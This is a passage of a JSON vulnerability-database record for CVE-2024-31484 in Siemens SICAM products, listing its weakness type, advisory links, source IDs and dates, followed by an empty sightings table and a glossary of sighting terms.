"https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Patch for Siemens SICAM products have unspecified vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/547196" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2024-23525" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-170", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2024-31484" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/html/ssa-871704.html" }, { "trust": 1.1, "url": "https://cert-portal.siemens.com/productcert/html/ssa-620338.html" }, { "trust": 1.0, "url": "http://seclists.org/fulldisclosure/2024/nov/18" }, { "trust": 1.0, "url": "http://seclists.org/fulldisclosure/2024/jul/4" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2024-31484" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2024-31485" }, { "trust": 0.1, "url": "https://support.industry.siemens.com/cs/ww/en/view/109804985/" }, { "trust": 0.1, "url": "https://support.industry.siemens.com/cs/ww/en/view/109818240/" }, { "trust": 0.1, "url": "https://support.industry.siemens.com/cs/ww/en/view/109813252/" }, { "trust": 0.1, "url": "https://www.sec-consult.com" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2024-31486" }, { "trust": 0.1, "url": "https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-siemens-a8000/" }, { "trust": 0.1, "url": "https://new.siemens.com/global/en/company/about.html" }, { "trust": 0.1, "url": "https://sec-consult.com/contact/" }, { "trust": 0.1, "url": "https://twitter.com/sec_consult" }, { "trust": 0.1, "url": "https://sec-consult.com/career/" }, { "trust": 0.1, "url": "https://www.siemens.com/global/en/products/energy/energy-automation-and-smart-grid.html" }, { "trust": 0.1, "url": "https://blog.sec-consult.com" }, { "trust": 0.1, "url": "https://support.industry.siemens.com/cs/ww/en/view/109812178/" }, { "trust": 0.1, "url": "https://sec-consult.com/vulnerability-lab/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2024-23525" }, { "db": "PACKETSTORM", "id": "179354" }, { "db": "NVD", "id": "CVE-2024-31484" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2024-23525" }, { "db": "PACKETSTORM", "id": "179354" }, { "db": "NVD", "id": "CVE-2024-31484" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2024-05-24T00:00:00", "db": "CNVD", "id": "CNVD-2024-23525" }, { "date": "2024-07-04T15:07:24", "db": "PACKETSTORM", "id": "179354" }, { "date": "2024-05-14T16:16:50.260000", "db": "NVD", "id": "CVE-2024-31484" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2024-05-22T00:00:00", "db": "CNVD", "id": "CNVD-2024-23525" }, { "date": "2024-11-27T21:15:07.400000", "db": "NVD", "id": "CVE-2024-31484" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Siemens SICAM products have unspecified vulnerabilities", "sources": [ { "db": "CNVD", "id": "CNVD-2024-23525" } ], "trust": 0.6 } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.